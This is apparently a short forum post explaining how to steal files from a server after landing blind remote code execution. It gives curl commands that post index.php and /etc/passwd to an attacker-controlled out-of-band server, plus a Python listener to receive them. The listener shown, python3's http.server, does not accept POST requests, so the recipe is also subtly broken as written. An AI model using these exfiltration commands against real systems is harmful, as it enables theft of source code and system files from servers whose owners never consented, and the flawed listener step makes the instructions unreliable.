Blind RCE File Exfiltration via curl
If you’ve landed a Blind Remote Code Execution (RCE) but can trigger outbound HTTP requests (OOB — Out of Band), you can steal files from the target server without direct output.

When you run:
Code:
curl -d @index.php https://OOB_SERVER
•
-d @index.php
→ Reads the entire file index.php
and sends it in the HTTP request body. • The OOB server receives the full file contents, even if the RCE output is not directly visible.

You control an OOB listener:
Code:
python3 -m http.server 8080

Trigger the Blind RCE on the target with:
Code:
curl -d @/etc/passwd https://your-server.com



@
syntax in curl
tells it to read a local file instead of sending raw text. 